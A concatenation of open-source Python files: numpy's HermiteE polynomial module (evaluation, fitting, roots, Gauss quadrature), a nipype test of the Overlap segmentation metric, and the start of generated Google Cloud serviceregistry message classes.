The parameters `x` and `y` are converted to arrays only if they are
    tuples or lists, otherwise they are treated as scalars and they
must have the same shape after conversion. In either case, either `x`
and `y` or their elements must support multiplication and addition both
with themselves and with the elements of `c`.
If `c` is a 1-D array a one is implicitly appended to its shape to make
it 2-D. The shape of the result will be c.shape[2:] + x.shape.
Parameters
----------
x, y : array_like, compatible objects
The two dimensional series is evaluated at the points `(x, y)`,
where `x` and `y` must have the same shape. If `x` or `y` is a list
or tuple, it is first converted to an ndarray, otherwise it is left
unchanged and if it isn't an ndarray it is treated as a scalar.
c : array_like
Array of coefficients ordered so that the coefficient of the term
of multi-degree i,j is contained in ``c[i,j]``. If `c` has
dimension greater than two the remaining indices enumerate multiple
sets of coefficients.
Returns
-------
values : ndarray, compatible object
The values of the two dimensional polynomial at points formed with
pairs of corresponding values from `x` and `y`.
See Also
--------
hermeval, hermegrid2d, hermeval3d, hermegrid3d
Notes
-----
.. versionadded::1.7.0
"""
try:
x, y = np.array((x, y), copy=0)
    except Exception:
raise ValueError('x, y are incompatible')
c = hermeval(x, c)
c = hermeval(y, c, tensor=False)
return c
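def _check_hermeval2d_simple():
    # Illustrative helper, not called anywhere in this module: for
    # c = [[1, 2], [3, 4]] the series is 1 + 2*y + 3*x + 4*x*y (He_1(t) = t),
    # so the value at (1, 1) should be 10.
    return np.allclose(hermeval2d(1., 1., [[1., 2.], [3., 4.]]), 10.0)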
def hermegrid2d(x, y, c):
"""
Evaluate a 2-D HermiteE series on the Cartesian product of x and y.
This function returns the values:
    .. math:: p(a,b) = \\sum_{i,j} c_{i,j} * He_i(a) * He_j(b)
where the points `(a, b)` consist of all pairs formed by taking
`a` from `x` and `b` from `y`. The resulting points form a grid with
`x` in the first dimension and `y` in the second.
The parameters `x` and `y` are converted to arrays only if they are
    tuples or lists, otherwise they are treated as scalars. In either
case, either `x` and `y` or their elements must support multiplication
and addition both with themselves and with the elements of `c`.
    If `c` has fewer than two dimensions, ones are implicitly appended to
    its shape to make it 2-D. The shape of the result will be c.shape[2:] +
    x.shape + y.shape.
Parameters
----------
x, y : array_like, compatible objects
The two dimensional series is evaluated at the points in the
Cartesian product of `x` and `y`. If `x` or `y` is a list or
tuple, it is first converted to an ndarray, otherwise it is left
unchanged and, if it isn't an ndarray, it is treated as a scalar.
c : array_like
Array of coefficients ordered so that the coefficients for terms of
degree i,j are contained in ``c[i,j]``. If `c` has dimension
greater than two the remaining indices enumerate multiple sets of
coefficients.
Returns
-------
values : ndarray, compatible object
The values of the two dimensional polynomial at points in the Cartesian
product of `x` and `y`.
See Also
--------
hermeval, hermeval2d, hermeval3d, hermegrid3d
Notes
-----
.. versionadded::1.7.0
"""
c = hermeval(x, c)
c = hermeval(y, c)
return c
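def _check_hermegrid2d_shape():
    # Illustrative helper, not called anywhere in this module: hermeval2d
    # pairs x and y pointwise, while hermegrid2d evaluates on the full
    # Cartesian product, so the grid result has shape x.shape + y.shape.
    x = np.array([0., 1., 2.])
    y = np.array([-1., 1.])
    c = [[1., 2.], [3., 4.]]
    return hermegrid2d(x, y, c).shape == (3, 2)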
def hermeval3d(x, y, z, c):
"""
Evaluate a 3-D Hermite_e series at points (x, y, z).
This function returns the values:
.. math:: p(x,y,z) = \\sum_{i,j,k} c_{i,j,k} * He_i(x) * He_j(y) * He_k(z)
The parameters `x`, `y`, and `z` are converted to arrays only if
    they are tuples or lists, otherwise they are treated as scalars and
they must have the same shape after conversion. In either case, either
`x`, `y`, and `z` or their elements must support multiplication and
addition both with themselves and with the elements of `c`.
If `c` has fewer than 3 dimensions, ones are implicitly appended to its
shape to make it 3-D. The shape of the result will be c.shape[3:] +
x.shape.
Parameters
----------
x, y, z : array_like, compatible object
The three dimensional series is evaluated at the points
`(x, y, z)`, where `x`, `y`, and `z` must have the same shape. If
any of `x`, `y`, or `z` is a list or tuple, it is first converted
to an ndarray, otherwise it is left unchanged and if it isn't an
ndarray it is treated as a scalar.
c : array_like
Array of coefficients ordered so that the coefficient of the term of
multi-degree i,j,k is contained in ``c[i,j,k]``. If `c` has dimension
greater than 3 the remaining indices enumerate multiple sets of
coefficients.
Returns
-------
values : ndarray, compatible object
The values of the multidimensional polynomial on points formed with
triples of corresponding values from `x`, `y`, and `z`.
See Also
--------
hermeval, hermeval2d, hermegrid2d, hermegrid3d
Notes
-----
.. versionadded::1.7.0
"""
try:
x, y, z = np.array((x, y, z), copy=0)
    except Exception:
raise ValueError('x, y, z are incompatible')
c = hermeval(x, c)
c = hermeval(y, c, tensor=False)
c = hermeval(z, c, tensor=False)
return c
def hermegrid3d(x, y, z, c):
"""
Evaluate a 3-D HermiteE series on the Cartesian product of x, y, and z.
This function returns the values:
.. math:: p(a,b,c) = \\sum_{i,j,k} c_{i,j,k} * He_i(a) * He_j(b) * He_k(c)
where the points `(a, b, c)` consist of all triples formed by taking
`a` from `x`, `b` from `y`, and `c` from `z`. The resulting points form
a grid with `x` in the first dimension, `y` in the second, and `z` in
the third.
The parameters `x`, `y`, and `z` are converted to arrays only if they
    are tuples or lists, otherwise they are treated as scalars. In
either case, either `x`, `y`, and `z` or their elements must support
multiplication and addition both with themselves and with the elements
of `c`.
If `c` has fewer than three dimensions, ones are implicitly appended to
its shape to make it 3-D. The shape of the result will be c.shape[3:] +
x.shape + y.shape + z.shape.
Parameters
----------
x, y, z : array_like, compatible objects
The three dimensional series is evaluated at the points in the
Cartesian product of `x`, `y`, and `z`. If `x`,`y`, or `z` is a
list or tuple, it is first converted to an ndarray, otherwise it is
left unchanged and, if it isn't an ndarray, it is treated as a
scalar.
c : array_like
        Array of coefficients ordered so that the coefficients for terms of
        degree i,j,k are contained in ``c[i,j,k]``. If `c` has dimension
        greater than three the remaining indices enumerate multiple sets of
        coefficients.
Returns
-------
values : ndarray, compatible object
        The values of the three dimensional polynomial at points in the
        Cartesian product of `x`, `y`, and `z`.
See Also
--------
hermeval, hermeval2d, hermegrid2d, hermeval3d
Notes
-----
.. versionadded::1.7.0
"""
c = hermeval(x, c)
c = hermeval(y, c)
c = hermeval(z, c)
return c
def hermevander(x, deg):
"""Pseudo-Vandermonde matrix of given degree.
Returns the pseudo-Vandermonde matrix of degree `deg` and sample points
`x`. The pseudo-Vandermonde matrix is defined by
.. math:: V[..., i] = He_i(x),
where `0 <= i <= deg`. The leading indices of `V` index the elements of
`x` and the last index is the degree of the HermiteE polynomial.
If `c` is a 1-D array of coefficients of length `n + 1` and `V` is the
array ``V = hermevander(x, n)``, then ``np.dot(V, c)`` and
``hermeval(x, c)`` are the same up to roundoff. This equivalence is
useful both for least squares fitting and for the evaluation of a large
number of HermiteE series of the same degree and sample points.
Parameters
----------
x : array_like
Array of points. The dtype is converted to float64 or complex128
depending on whether any of the elements are complex. If `x` is
scalar it is converted to a 1-D array.
deg : int
Degree of the resulting matrix.
Returns
-------
vander : ndarray
The pseudo-Vandermonde matrix. The shape of the returned matrix is
        ``x.shape + (deg + 1,)``, where the last index is the degree of the
corresponding HermiteE polynomial. The dtype will be the same as
the converted `x`.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermevander
>>> x = np.array([-1, 0, 1])
>>> hermevander(x, 3)
array([[ 1., -1., 0., 2.],
[ 1., 0., -1., -0.],
[ 1., 1., 0., -2.]])
"""
ideg = int(deg)
if ideg != deg:
raise ValueError("deg must be integer")
if ideg < 0:
raise ValueError("deg must be non-negative")
x = np.array(x, copy=0, ndmin=1) + 0.0
dims = (ideg + 1,) + x.shape
dtyp = x.dtype
v = np.empty(dims, dtype=dtyp)
v[0] = x*0 + 1
if ideg > 0:
v[1] = x
for i in range(2, ideg + 1):
v[i] = (v[i-1]*x - v[i-2]*(i - 1))
return np.rollaxis(v, 0, v.ndim)
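def _check_hermevander_consistency():
    # Illustrative helper, not called anywhere in this module: as stated in
    # the docstring, np.dot(hermevander(x, n), c) matches hermeval(x, c) up
    # to roundoff for 1-D coefficients of length n + 1.
    x = np.linspace(-2., 2., 5)
    c = np.array([1., 2., 3., 4.])
    return np.allclose(np.dot(hermevander(x, len(c) - 1), c), hermeval(x, c))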
def hermevander2d(x, y, deg):
"""Pseudo-Vandermonde matrix of given degrees.
Returns the pseudo-Vandermonde matrix of degrees `deg` and sample
points `(x, y)`. The pseudo-Vandermonde matrix is defined by
.. math:: V[..., deg[1]*i + j] = He_i(x) * He_j(y),
where `0 <= i <= deg[0]` and `0 <= j <= deg[1]`. The leading indices of
`V` index the points `(x, y)` and the last index encodes the degrees of
the HermiteE polynomials.
If ``V = hermevander2d(x, y, [xdeg, ydeg])``, then the columns of `V`
correspond to the elements of a 2-D coefficient array `c` of shape
(xdeg + 1, ydeg + 1) in the order
.. math:: c_{00}, c_{01}, c_{02} ... , c_{10}, c_{11}, c_{12} ...
and ``np.dot(V, c.flat)`` and ``hermeval2d(x, y, c)`` will be the same
up to roundoff. This equivalence is useful both for least squares
fitting and for the evaluation of a large number of 2-D HermiteE
series of the same degrees and sample points.
Parameters
----------
x, y : array_like
Arrays of point coordinates, all of the same shape. The dtypes
will be converted to either float64 or complex128 depending on
whether any of the elements are complex. Scalars are converted to
1-D arrays.
deg : list of ints
List of maximum degrees of the form [x_deg, y_deg].
Returns
-------
vander2d : ndarray
The shape of the returned matrix is ``x.shape + (order,)``, where
        :math:`order = (deg[0]+1)*(deg[1]+1)`. The dtype will be the same
as the converted `x` and `y`.
See Also
--------
    hermevander, hermevander3d, hermeval2d, hermeval3d
Notes
-----
.. versionadded::1.7.0
"""
ideg = [int(d) for d in deg]
is_valid = [id == d and id >= 0 for id, d in zip(ideg, deg)]
if is_valid != [1, 1]:
raise ValueError("degrees must be non-negative integers")
degx, degy = ideg
x, y = np.array((x, y), copy=0) + 0.0
vx = hermevander(x, degx)
vy = hermevander(y, degy)
v = vx[..., None]*vy[..., None,:]
return v.reshape(v.shape[:-2] + (-1,))
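def _check_hermevander2d_consistency():
    # Illustrative helper, not called anywhere in this module: the columns of
    # the 2-D pseudo-Vandermonde matrix line up with c.flat, so
    # np.dot(V, c.flat) matches hermeval2d(x, y, c) up to roundoff.
    x = np.array([0., 1., -1.])
    y = np.array([0.5, 2., -2.])
    c = np.arange(6.).reshape(2, 3)
    V = hermevander2d(x, y, [1, 2])
    return np.allclose(np.dot(V, c.flat), hermeval2d(x, y, c))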
def hermevander3d(x, y, z, deg):
"""Pseudo-Vandermonde matrix of given degrees.
Returns the pseudo-Vandermonde matrix of degrees `deg` and sample
points `(x, y, z)`. If `l, m, n` are the given degrees in `x, y, z`,
    then the pseudo-Vandermonde matrix is defined by
.. math:: V[..., (m+1)(n+1)i + (n+1)j + k] = He_i(x)*He_j(y)*He_k(z),
    where `0 <= i <= l`, `0 <= j <= m`, and `0 <= k <= n`. The leading
indices of `V` index the points `(x, y, z)` and the last index encodes
the degrees of the HermiteE polynomials.
If ``V = hermevander3d(x, y, z, [xdeg, ydeg, zdeg])``, then the columns
of `V` correspond to the elements of a 3-D coefficient array `c` of
shape (xdeg + 1, ydeg + 1, zdeg + 1) in the order
.. math:: c_{000}, c_{001}, c_{002},... , c_{010}, c_{011}, c_{012},...
and ``np.dot(V, c.flat)`` and ``hermeval3d(x, y, z, c)`` will be the
same up to roundoff. This equivalence is useful both for least squares
fitting and for the evaluation of a large number of 3-D HermiteE
series of the same degrees and sample points.
Parameters
----------
x, y, z : array_like
Arrays of point coordinates, all of the same shape. The dtypes will
be converted to either float64 or complex128 depending on whether
any of the elements are complex. Scalars are converted to 1-D
arrays.
deg : list of ints
List of maximum degrees of the form [x_deg, y_deg, z_deg].
Returns
-------
vander3d : ndarray
The shape of the returned matrix is ``x.shape + (order,)``, where
        :math:`order = (deg[0]+1)*(deg[1]+1)*(deg[2]+1)`. The dtype will
be the same as the converted `x`, `y`, and `z`.
See Also
--------
    hermevander, hermevander2d, hermeval2d, hermeval3d
Notes
-----
.. versionadded::1.7.0
"""
ideg = [int(d) for d in deg]
is_valid = [id == d and id >= 0 for id, d in zip(ideg, deg)]
if is_valid != [1, 1, 1]:
raise ValueError("degrees must be non-negative integers")
degx, degy, degz = ideg
x, y, z = np.array((x, y, z), copy=0) + 0.0
vx = hermevander(x, degx)
vy = hermevander(y, degy)
vz = hermevander(z, degz)
v = vx[..., None, None]*vy[..., None,:, None]*vz[..., None, None,:]
return v.reshape(v.shape[:-3] + (-1,))
def hermefit(x, y, deg, rcond=None, full=False, w=None):
"""
Least squares fit of Hermite series to data.
Return the coefficients of a HermiteE series of degree `deg` that is
the least squares fit to the data values `y` given at points `x`. If
`y` is 1-D the returned coefficients will also be 1-D. If `y` is 2-D
multiple fits are done, one for each column of `y`, and the resulting
coefficients are stored in the corresponding columns of a 2-D return.
The fitted polynomial(s) are in the form
.. math:: p(x) = c_0 + c_1 * He_1(x) + ... + c_n * He_n(x),
where `n` is `deg`.
Parameters
----------
x : array_like, shape (M,)
x-coordinates of the M sample points ``(x[i], y[i])``.
y : array_like, shape (M,) or (M, K)
y-coordinates of the sample points. Several data sets of sample
points sharing the same x-coordinates can be fitted at once by
passing in a 2D-array that contains one dataset per column.
deg : int
Degree of the fitting polynomial
rcond : float, optional
Relative condition number of the fit. Singular values smaller than
this relative to the largest singular value will be ignored. The
default value is len(x)*eps, where eps is the relative precision of
the float type, about 2e-16 in most cases.
full : bool, optional
Switch determining nature of return value. When it is False (the
default) just the coefficients are returned, when True diagnostic
information from the singular value decomposition is also returned.
w : array_like, shape (`M`,), optional
Weights. If not None, the contribution of each point
``(x[i],y[i])`` to the fit is weighted by `w[i]`. Ideally the
weights are chosen so that the errors of the products ``w[i]*y[i]``
all have the same variance. The default value is None.
Returns
-------
    coef : ndarray, shape (deg + 1,) or (deg + 1, K)
Hermite coefficients ordered from low to high. If `y` was 2-D,
the coefficients for the data in column k of `y` are in column
`k`.
[residuals, rank, singular_values, rcond] : list
These values are only returned if `full` = True
resid -- sum of squared residuals of the least squares fit
rank -- the numerical rank of the scaled Vandermonde matrix
sv -- singular values of the scaled Vandermonde matrix
rcond -- value of `rcond`.
For more details, see `linalg.lstsq`.
Warns
-----
RankWarning
The rank of the coefficient matrix in the least-squares fit is
deficient. The warning is only raised if `full` = False. The
warnings can be turned off by
>>> import warnings
>>> warnings.simplefilter('ignore', RankWarning)
See Also
--------
    chebfit, legfit, polyfit, hermfit
hermeval : Evaluates a Hermite series.
hermevander : pseudo Vandermonde matrix of Hermite series.
hermeweight : HermiteE weight function.
linalg.lstsq : Computes a least-squares fit from the matrix.
scipy.interpolate.UnivariateSpline : Computes spline fits.
Notes
-----
The solution is the coefficients of the HermiteE series `p` that
minimizes the sum of the weighted squared errors
.. math:: E = \\sum_j w_j^2 * |y_j - p(x_j)|^2,
where the :math:`w_j` are the weights. This problem is solved by
setting up the (typically) overdetermined matrix equation
.. math:: V(x) * c = w * y,
where `V` is the pseudo Vandermonde matrix of `x`, the elements of `c`
are the coefficients to be solved for, and the elements of `y` are the
observed values. This equation is then solved using the singular value
decomposition of `V`.
If some of the singular values of `V` are so small that they are
neglected, then a `RankWarning` will be issued. This means that the
coefficient values may be poorly determined. Using a lower order fit
will usually get rid of the warning. The `rcond` parameter can also be
set to a value smaller than its default, but the resulting fit may be
spurious and have large contributions from roundoff error.
Fits using HermiteE series are probably most useful when the data can
be approximated by ``sqrt(w(x)) * p(x)``, where `w(x)` is the HermiteE
    weight. In that case the weight ``sqrt(w(x[i]))`` should be used
    together with data values ``y[i]/sqrt(w(x[i]))``. The weight function is
available as `hermeweight`.
References
----------
.. [1] Wikipedia, "Curve fitting",
http://en.wikipedia.org/wiki/Curve_fitting
Examples
--------
    >>> from numpy.polynomial.hermite_e import hermefit, hermeval
>>> x = np.linspace(-10, 10)
>>> err = np.random.randn(len(x))/10
>>> y = hermeval(x, [1, 2, 3]) + err
>>> hermefit(x, y, 2)
array([ 1.01690445, 1.99951418, 2.99948696])
"""
order = int(deg) + 1
x = np.asarray(x) + 0.0
y = np.asarray(y) + 0.0
# check arguments.
if deg < 0:
raise ValueError("expected deg >= 0")
if x.ndim != 1:
raise TypeError("expected 1D vector for x")
if x.size == 0:
raise TypeError("expected non-empty vector for x")
if y.ndim < 1 or y.ndim > 2:
raise TypeError("expected 1D or 2D array for y")
if len(x) != len(y):
raise TypeError("expected x and y to have same length")
# set up the least squares matrices in transposed form
lhs = hermevander(x, deg).T
rhs = y.T
if w is not None:
w = np.asarray(w) + 0.0
if w.ndim != 1:
raise TypeError("expected 1D vector for w")
if len(x) != len(w):
raise TypeError("expected x and w to have same length")
# apply weights. Don't use inplace operations as they
# can cause problems with NA.
lhs = lhs * w
rhs = rhs * w
# set rcond
if rcond is None:
rcond = len(x)*np.finfo(x.dtype).eps
# Determine the norms of the design matrix columns.
if issubclass(lhs.dtype.type, np.complexfloating):
scl = np.sqrt((np.square(lhs.real) + np.square(lhs.imag)).sum(1))
else:
scl = np.sqrt(np.square(lhs).sum(1))
scl[scl == 0] = 1
# Solve the least squares problem.
c, resids, rank, s = la.lstsq(lhs.T/scl, rhs.T, rcond)
c = (c.T/scl).T
# warn on rank reduction
if rank != order and not full:
msg = "The fit may be poorly conditioned"
warnings.warn(msg, pu.RankWarning)
if full:
return c, [resids, rank, s, rcond]
else:
return c
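def _check_hermefit_exact():
    # Illustrative helper, not called anywhere in this module: with
    # noise-free data generated from a known HermiteE series, the least
    # squares fit recovers the coefficients to roundoff.
    x = np.linspace(-3., 3., 20)
    coef = np.array([1., 2., 3.])
    return np.allclose(hermefit(x, hermeval(x, coef), 2), coef)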
def hermecompanion(c):
"""
Return the scaled companion matrix of c.
The basis polynomials are scaled so that the companion matrix is
symmetric when `c` is an HermiteE basis polynomial. This provides
better eigenvalue estimates than the unscaled case and for basis
polynomials the eigenvalues are guaranteed to be real if
`numpy.linalg.eigvalsh` is used to obtain them.
Parameters
----------
c : array_like
1-D array of HermiteE series coefficients ordered from low to high
degree.
Returns
-------
mat : ndarray
Scaled companion matrix of dimensions (deg, deg).
Notes
-----
.. versionadded::1.7.0
"""
# c is a trimmed copy
[c] = pu.as_series([c])
if len(c) < 2:
raise ValueError('Series must have maximum degree of at least 1.')
if len(c) == 2:
return np.array([[-c[0]/c[1]]])
n = len(c) - 1
mat = np.zeros((n, n), dtype=c.dtype)
scl = np.hstack((1., 1./np.sqrt(np.arange(n - 1, 0, -1))))
scl = np.multiply.accumulate(scl)[::-1]
top = mat.reshape(-1)[1::n+1]
bot = mat.reshape(-1)[n::n+1]
top[...] = np.sqrt(np.arange(1, n))
bot[...] = top
mat[:, -1] -= scl*c[:-1]/c[-1]
return mat
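def _check_hermecompanion_eigenvalues():
    # Illustrative helper, not called anywhere in this module: the
    # eigenvalues of the companion matrix are the roots of the series, so for
    # hermefromroots((-1, 0, 1)) they should be -1, 0 and 1.
    c = hermefromroots((-1., 0., 1.))
    ev = np.sort(la.eigvals(hermecompanion(c)))
    return np.allclose(ev, [-1., 0., 1.])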
def hermeroots(c):
"""
Compute the roots of a HermiteE series.
Return the roots (a.k.a. "zeros") of the polynomial
.. math:: p(x) = \\sum_i c[i] * He_i(x).
Parameters
----------
c : 1-D array_like
1-D array of coefficients.
Returns
-------
out : ndarray
Array of the roots of the series. If all the roots are real,
then `out` is also real, otherwise it is complex.
See Also
--------
polyroots, legroots, lagroots, hermroots, chebroots
Notes
-----
The root estimates are obtained as the eigenvalues of the companion
    matrix. Roots far from the origin of the complex plane may have large
errors due to the numerical instability of the series for such
values. Roots with multiplicity greater than 1 will also show larger
errors as the value of the series near such points is relatively
insensitive to errors in the roots. Isolated roots near the origin can
be improved by a few iterations of Newton's method.
The HermiteE series basis polynomials aren't powers of `x` so the
results of this function may seem unintuitive.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermeroots, hermefromroots
>>> coef = hermefromroots([-1, 0, 1])
>>> coef
array([ 0., 2., 0., 1.])
>>> hermeroots(coef)
array([-1., 0., 1.])
"""
# c is a trimmed copy
[c] = pu.as_series([c])
if len(c) <= 1:
return np.array([], dtype=c.dtype)
if len(c) == 2:
return np.array([-c[0]/c[1]])
m = hermecompanion(c)
r = la.eigvals(m)
r.sort()
return r
def _normed_hermite_e_n(x, n):
"""
Evaluate a normalized HermiteE polynomial.
Compute the value of the normalized HermiteE polynomial of degree ``n``
at the points ``x``.
Parameters
----------
x : ndarray of double.
Points at which to evaluate the function
n : int
Degree of the normalized HermiteE function to be evaluated.
Returns
-------
values : ndarray
The shape of the return value is described above.
Notes
-----
.. versionadded:: 1.10.0
This function is needed for finding the Gauss points and integration
weights for high degrees. The values of the standard HermiteE functions
overflow when n >= 207.
"""
if n == 0:
return np.ones(x.shape)/np.sqrt(np.sqrt(2*np.pi))
c0 = 0.
c1 = 1./np.sqrt(np.sqrt(2*np.pi))
nd = float(n)
for i in range(n - 1):
tmp = c0
c0 = -c1*np.sqrt((nd - 1.)/nd)
c1 = tmp + c1*x*np.sqrt(1./nd)
nd = nd - 1.0
return c0 + c1*x
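def _check_normed_hermite_e_n():
    # Illustrative helper, not called anywhere in this module: the normalized
    # polynomial equals He_n(x)/sqrt(n!*sqrt(2*pi)), so for moderate n the
    # stable recurrence above should agree with a direct evaluation of the
    # basis polynomial through hermeval.
    x = np.linspace(-1., 1., 5)
    n = 4
    fact = float(np.prod(np.arange(1, n + 1)))
    expected = hermeval(x, [0.]*n + [1.])/np.sqrt(fact*np.sqrt(2*np.pi))
    return np.allclose(_normed_hermite_e_n(x, n), expected)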
def hermegauss(deg):
"""
Gauss-HermiteE quadrature.
Computes the sample points and weights for Gauss-HermiteE quadrature.
These sample points and weights will correctly integrate polynomials of
    degree :math:`2*deg - 1` or less over the interval :math:`[-\infty, \infty]`
    with the weight function :math:`f(x) = \exp(-x^2/2)`.
Parameters
----------
deg : int
Number of sample points and weights. It must be >= 1.
Returns
-------
x : ndarray
1-D ndarray containing the sample points.
y : ndarray
1-D ndarray containing the weights.
Notes
-----
.. versionadded::1.7.0
    The results have only been tested up to degree 100; higher degrees may
    be problematic. The weights are determined by using the fact that
.. math:: w_k = c / (He'_n(x_k) * He_{n-1}(x_k))
where :math:`c` is a constant independent of :math:`k` and :math:`x_k`
is the k'th root of :math:`He_n`, and then scaling the results to get
the right value when integrating 1.
"""
ideg = int(deg)
if ideg != deg or ideg < 1:
raise ValueError("deg must be a non-negative integer")
# first approximation of roots. We use the fact that the companion
# matrix is symmetric in this case in order to obtain better zeros.
c = np.array([0]*deg + [1])
m = hermecompanion(c)
x = la.eigvalsh(m)
x.sort()
# improve roots by one application of Newton
dy = _normed_hermite_e_n(x, ideg)
df = _normed_hermite_e_n(x, ideg - 1) * np.sqrt(ideg)
x -= dy/df
# compute the weights. We scale the factor to avoid possible numerical
# overflow.
fm = _normed_hermite_e_n(x, ideg - 1)
fm /= np.abs(fm).max()
w = 1/(fm * fm)
# for Hermite_e we can also symmetrize
w = (w + w[::-1])/2
x = (x - x[::-1])/2
# scale w to get the right value
w *= np.sqrt(2*np.pi) / w.sum()
return x, w
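def _check_hermegauss_moments():
    # Illustrative helper, not called anywhere in this module: the quadrature
    # rule integrates against the weight exp(-x**2/2), so the integrals of 1
    # and of x**2 over the real line are both sqrt(2*pi).
    x, w = hermegauss(10)
    total = np.sqrt(2*np.pi)
    return np.allclose([w.sum(), (w*x**2).sum()], [total, total])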
def hermeweight(x):
"""Weight function of the Hermite_e polynomials.
The weight function is :math:`\exp(-x^2/2)` and the interval of
    integration is :math:`[-\infty, \infty]`. The HermiteE polynomials are
orthogonal, but not normalized, with respect to this weight function.
Parameters
----------
x : array_like
Values at which the weight function will be computed.
Returns
-------
w : ndarray
The weight function at `x`.
Notes
-----
.. versionadded::1.7.0
"""
w = np.exp(-.5*x**2)
return w
#
# HermiteE series class
#
class HermiteE(ABCPolyBase):
"""An HermiteE series class.
The HermiteE class provides the standard Python numerical methods
'+', '-', '*', '//', '%', 'divmod', '**', and '()' as well as the
attributes and methods listed in the `ABCPolyBase` documentation.
Parameters
----------
coef : array_like
        HermiteE coefficients in order of increasing degree, i.e.,
        ``(1, 2, 3)`` gives ``1*He_0(x) + 2*He_1(x) + 3*He_2(x)``.
domain : (2,) array_like, optional
Domain to use. The interval ``[domain[0], domain[1]]`` is mapped
to the interval ``[window[0], window[1]]`` by shifting and scaling.
The default value is [-1, 1].
window : (2,) array_like, optional
Window, see `domain` for its use. The default value is [-1, 1].
.. versionadded:: 1.6.0
"""
# Virtual Functions
_add = staticmethod(hermeadd)
_sub = staticmethod(hermesub)
_mul = staticmethod(hermemul)
_div = staticmethod(hermediv)
_pow = staticmethod(hermepow)
_val = staticmethod(hermeval)
_int = staticmethod(hermeint)
_der = staticmethod(hermeder)
_fit = staticmethod(hermefit)
_line = staticmethod(hermeline)
_roots = staticmethod(hermeroots)
_fromroots = staticmethod(hermefromroots)
# Virtual properties
nickname = 'herme'
domain = np.array(hermedomain)
window = np.array(hermedomain)
| bsd-3-clause |
grlee77/nipype | nipype/algorithms/tests/test_overlap.py | 7 | 1388 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
import os
from shutil import rmtree
from tempfile import mkdtemp
from nipype.testing import (assert_equal, assert_raises,
assert_almost_equal, example_data)
import numpy as np
import nibabel as nb
def test_overlap():
from nipype.algorithms.metrics import Overlap
def check_close(val1, val2):
import numpy.testing as npt
return npt.assert_almost_equal(val1, val2, decimal=3)
tempdir = mkdtemp()
in1 = example_data('segmentation0.nii.gz')
in2 = example_data('segmentation1.nii.gz')
os.chdir(tempdir)
overlap = Overlap()
overlap.inputs.volume1 = in1
overlap.inputs.volume2 = in1
res = overlap.run()
yield check_close, res.outputs.jaccard, 1.0
overlap = Overlap()
overlap.inputs.volume1 = in1
overlap.inputs.volume2 = in2
res = overlap.run()
yield check_close, res.outputs.jaccard, 0.99705
overlap = Overlap()
overlap.inputs.volume1 = in1
overlap.inputs.volume2 = in2
overlap.inputs.vol_units = 'mm'
res = overlap.run()
yield check_close, res.outputs.jaccard, 0.99705
yield (check_close, res.outputs.roi_voldiff,
np.array([0.0063086, -0.0025506, 0.0]))
rmtree(tempdir)
| bsd-3-clause |
Sorsly/subtle | google-cloud-sdk/lib/googlecloudsdk/third_party/apis/serviceregistry/v1alpha/serviceregistry_v1alpha_messages.py | 1 | 22119 | """Generated message classes for serviceregistry version v1alpha.
Manages service endpoints in Service Registry and provides integration with
DNS for service discovery and name resolution.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.protorpclite import messages as _messages
package = 'serviceregistry'
class Endpoint(_messages.Message):
"""Next available tag: 13
Fields:
addresses: User-provided addresses and ports of the service represented by
an endpoint.
creationTimestamp: [Output Only] Creation timestamp in RFC3339 text
format.
description: An optional user-provided description of the endpoint.
dnsIntegration: The DNS configuration for this endpoint. This must be a
list of fully-qualified URLs to Compute Engine networks.
fingerprint: Supply the fingerprint value for update requests. The
fingerprint value is generated by the server and ensures optimistic
concurrency (so that only one update can be performed at a time). The
fingerprint changes after each update.
id: [Output Only] Unique identifier for the resource; defined by the
server.
name: A user-provided name of the endpoint, which must be unique within
the project. The name must comply with RFC1035. Specifically, the name
must be 1-63 characters long and match the regular expression
[a-z]([-a-z0-9]*[a-z0-9])? which means the first character must be a
lowercase letter, and all following characters must be a dash, lowercase
letter, or digit, except the last character, which cannot be a dash.
selfLink: [Output Only] Self link for the endpoint.
state: [Output Only] The current state of the endpoint, as determined by
the system.
"""
addresses = _messages.MessageField('EndpointAddress', 1, repeated=True)
creationTimestamp = _messages.StringField(2)
description = _messages.StringField(3)
dnsIntegration = _messages.MessageField('EndpointDnsIntegration', 4)
fingerprint = _messages.BytesField(5)
id = _messages.IntegerField(6, variant=_messages.Variant.UINT64)
name = _messages.StringField(7)
selfLink = _messages.StringField(8)
state = _messages.StringField(9)
class EndpointAddress(_messages.Message):
"""Information about a single address and the corresponding ports for an
endpoint.
Fields:
address: A list of addresses of the service represented by an endpoint.
Each address can be an IPv4 or IPv6 address, or a hostname.
ports: A list of ports to be used with this address.
"""
address = _messages.StringField(1)
ports = _messages.MessageField('EndpointPort', 2, repeated=True)
class EndpointDnsIntegration(_messages.Message):
"""A EndpointDnsIntegration object.
Fields:
enableExternal: True if a cloud.goog DNS entry should be created to expose
this endpoint externally. NOTE: This feature will be enabled by August
1.
externalDnsName: [Output Only] Externally visible fully qualified domain
name for the endpoint.
internalDnsName: [Output Only] Fully qualified domain name for the
endpoint; used when addressing the endpoint from within Compute Networks
specified in the networks field.
networks: A list of Google Compute Engine networks for which the name of
this endpoint is resolvable through DNS.
"""
enableExternal = _messages.BooleanField(1)
externalDnsName = _messages.StringField(2)
internalDnsName = _messages.StringField(3)
networks = _messages.StringField(4, repeated=True)
class EndpointPort(_messages.Message):
"""Information about a single port used by an endpoint.
Fields:
name: The name of the port. This is optional if only one port is defined
for the endpoint.
portNumber: The port number of the endpoint.
protocol: An optional user-supplied protocol for this port. Must be one of
the following protocol strings: tcp, udp, icmp, esp, ah, or sctp. The
default is tcp.
"""
name = _messages.StringField(1)
portNumber = _messages.IntegerField(2, variant=_messages.Variant.INT32)
protocol = _messages.StringField(3)
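def _example_endpoint_message():
  """Illustrative sketch only; the names and values below are made up.
  Shows how the message classes above fit together when building an Endpoint
  by hand. It is not part of the generated API surface.
  """
  port = EndpointPort(name='http', portNumber=8080, protocol='tcp')
  address = EndpointAddress(address='10.0.0.2', ports=[port])
  dns = EndpointDnsIntegration(
      networks=['https://www.googleapis.com/compute/v1/projects/'
                'example-project/global/networks/default'])
  return Endpoint(name='example-endpoint', description='Example only.',
                  addresses=[address], dnsIntegration=dns)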
class EndpointsListResponse(_messages.Message):
"""A response containing a partial list of Endpoints and a page token used
to build the next request if the request has been truncated. Next available
tag: 6
Fields:
endpoints: The endpoints contained in this response.
